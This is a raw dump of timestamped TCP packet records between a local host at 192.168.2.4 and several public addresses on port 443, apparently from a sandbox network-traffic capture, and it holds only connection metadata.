                                                            Feb 1, 2024 21:38:19.228224039 CET44349760104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.228256941 CET49760443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.228641033 CET44349760104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.228703976 CET44349760104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.228734970 CET44349760104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.228735924 CET49760443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.228743076 CET44349760104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.228795052 CET49760443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.228801966 CET44349760104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.229469061 CET44349760104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.229499102 CET44349760104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.229511023 CET49760443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.229521990 CET44349760104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.229557991 CET49760443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.229763031 CET44349760104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.229820967 CET44349760104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.229856968 CET49760443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.229938030 CET49760443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.229955912 CET44349760104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.307744980 CET49761443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.307836056 CET44349761104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.307904005 CET49761443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.309072971 CET49761443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.309092045 CET44349761104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.550506115 CET44349761104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.551626921 CET49761443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.551651955 CET44349761104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.552017927 CET44349761104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.553112984 CET49761443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.553190947 CET44349761104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.553500891 CET49761443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.597907066 CET44349761104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.835515022 CET44349761104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.835648060 CET44349761104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:19.835721016 CET49761443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.836750984 CET49761443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:19.836796045 CET44349761104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:20.693380117 CET44349741108.177.122.106192.168.2.4
                                                            Feb 1, 2024 21:38:20.693447113 CET44349741108.177.122.106192.168.2.4
                                                            Feb 1, 2024 21:38:20.693578959 CET49741443192.168.2.4108.177.122.106
                                                            Feb 1, 2024 21:38:22.632870913 CET49741443192.168.2.4108.177.122.106
                                                            Feb 1, 2024 21:38:22.632911921 CET44349741108.177.122.106192.168.2.4
                                                            Feb 1, 2024 21:38:36.939526081 CET49767443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:36.939573050 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:36.941509962 CET49767443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:36.941509962 CET49767443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:36.941562891 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.184009075 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.184317112 CET49767443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.184331894 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.184797049 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.185358047 CET49767443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.185436010 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.185854912 CET49767443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.185930014 CET49767443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.185950994 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.186368942 CET49767443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.186397076 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.474653006 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.474704027 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.474734068 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.474781990 CET49767443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.474801064 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.474872112 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.474905014 CET49767443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.475059032 CET49767443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.475688934 CET49767443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.475701094 CET44349767104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.498859882 CET49768443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:37.498900890 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:37.498967886 CET49768443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:37.506736040 CET49768443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:37.506747961 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:37.513612032 CET49769443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.513648033 CET44349769104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.513710022 CET49769443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.514216900 CET49769443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.514230967 CET44349769104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.753566027 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:37.754065990 CET49768443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:37.754081011 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:37.754703045 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:37.755096912 CET49768443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:37.755233049 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:37.755316019 CET49768443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:37.755384922 CET49768443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:37.755399942 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:37.755907059 CET44349769104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.756124973 CET49769443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.756149054 CET44349769104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.756474018 CET44349769104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.756844044 CET49769443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.756891966 CET44349769104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:37.756983995 CET49769443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:37.801896095 CET44349769104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:38.039160013 CET44349769104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:38.039283037 CET44349769104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:38.039354086 CET49769443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:38.040369987 CET49769443192.168.2.4104.17.3.184
                                                            Feb 1, 2024 21:38:38.040417910 CET44349769104.17.3.184192.168.2.4
                                                            Feb 1, 2024 21:38:38.055798054 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.055943966 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.056019068 CET49768443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.056034088 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.056065083 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.056272030 CET49768443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.056286097 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.056340933 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.056407928 CET49768443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.059448957 CET49768443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.059465885 CET44349768104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.092875004 CET49770443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.092911959 CET44349770104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.092966080 CET49770443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.093430996 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.093523026 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.093585014 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.096821070 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.096873999 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.097261906 CET49770443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.097274065 CET44349770104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.106627941 CET49772443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.106671095 CET44349772104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.106750011 CET49772443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.107120037 CET49772443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.107132912 CET44349772104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.359550953 CET44349770104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.359908104 CET49770443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.359920025 CET44349770104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.360734940 CET44349770104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.361305952 CET49770443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.361305952 CET49770443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.361320019 CET44349770104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.361355066 CET49770443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.361466885 CET44349770104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.361898899 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.362124920 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.362202883 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.362328053 CET44349772104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.362514973 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.362624884 CET49772443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.362647057 CET44349772104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.362945080 CET44349772104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.362994909 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.363060951 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.363286972 CET49772443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.363342047 CET44349772104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.363493919 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.363616943 CET49772443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.405915976 CET44349772104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.405915976 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.411653996 CET49770443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.643734932 CET44349772104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.643881083 CET44349772104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.643944025 CET49772443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.644543886 CET49772443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.644565105 CET44349772104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.646795034 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.646991014 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.647078037 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.647095919 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.647149086 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.647253036 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.647289991 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.647424936 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.647486925 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.647501945 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.647587061 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.647675037 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.647735119 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.647747993 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.647838116 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.647896051 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.647907019 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.647963047 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.647974014 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.648060083 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.648159027 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.648185015 CET44349771104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:38.648211956 CET49771443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:38.726267099 CET44349735108.157.162.84192.168.2.4
                                                            Feb 1, 2024 21:38:38.726466894 CET44349735108.157.162.84192.168.2.4
                                                            Feb 1, 2024 21:38:38.726557970 CET49735443192.168.2.4108.157.162.84
                                                            Feb 1, 2024 21:38:40.631772041 CET49735443192.168.2.4108.157.162.84
                                                            Feb 1, 2024 21:38:40.631807089 CET44349735108.157.162.84192.168.2.4
                                                            Feb 1, 2024 21:38:41.154319048 CET44349770104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:41.154426098 CET44349770104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:41.155045986 CET49770443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:41.157146931 CET49770443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:41.157174110 CET44349770104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:41.157215118 CET49770443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:41.157736063 CET49770443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:41.158106089 CET49773443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:41.158138037 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:41.158385038 CET49773443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:41.158691883 CET49773443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:41.158710957 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:41.403342009 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:41.403753996 CET49773443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:41.403775930 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:41.404274940 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:41.404761076 CET49773443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:41.404761076 CET49773443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:41.404798985 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:41.404860973 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:41.457911968 CET49773443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.534888983 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.534955025 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.535000086 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.535020113 CET49773443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.535036087 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.535049915 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.535075903 CET49773443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.535173893 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.535290956 CET49773443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.592078924 CET49773443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.592114925 CET44349773104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.593527079 CET49774443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.593559980 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.593622923 CET49774443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.593902111 CET49774443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.593913078 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.594475031 CET49775443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.594521999 CET44349775104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.594585896 CET49775443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.595158100 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.595190048 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.595266104 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.595352888 CET49775443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.595367908 CET44349775104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.595495939 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.595511913 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.845302105 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.845606089 CET49774443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.845618963 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.846122026 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.846447945 CET49774443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.846518993 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.846731901 CET49774443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.854233980 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.854587078 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.854602098 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.855468988 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.855751991 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.856422901 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.856422901 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.856432915 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.856489897 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.861764908 CET44349775104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.861965895 CET49775443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.861989021 CET44349775104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.862612963 CET44349775104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.862941980 CET49775443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.863058090 CET44349775104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.863059044 CET49775443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.889910936 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.897828102 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.897840977 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.905905008 CET44349775104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:42.913455009 CET49775443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:42.947022915 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.314925909 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.314975023 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.315017939 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.315049887 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.315085888 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.315119028 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.315140963 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.315152884 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.315160990 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.315170050 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.315232038 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.315258026 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.315274000 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.315274000 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.315296888 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.315362930 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.368957043 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.421420097 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.424902916 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.424935102 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.424998999 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.425014973 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.425201893 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.432599068 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.440692902 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.440733910 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.440824986 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.440844059 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.440896988 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.447957993 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.456511021 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.456536055 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.456563950 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.456588984 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.456768036 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.463378906 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.471970081 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.471998930 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.472162962 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.472182989 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.472340107 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.478996992 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.488744974 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.488775969 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.488826036 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.488851070 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.488907099 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.498030901 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.498111010 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.498153925 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.498197079 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.498198986 CET49774443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.498213053 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.498239040 CET49774443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.498280048 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.498318911 CET49774443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.498328924 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.498575926 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.498605967 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.498656988 CET49774443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.498665094 CET44349774104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.498701096 CET49774443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.537161112 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.542855024 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.542916059 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.542917013 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.542937994 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.543142080 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.543148041 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.548846006 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.548921108 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.548928976 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.553129911 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.553227901 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.553237915 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.561563969 CET44349776104.21.73.88192.168.2.4
                                                            Feb 1, 2024 21:38:44.561707020 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.562565088 CET49776443192.168.2.4104.21.73.88
                                                            Feb 1, 2024 21:38:44.562581062 CET44349776104.21.73.88192.168.2.4
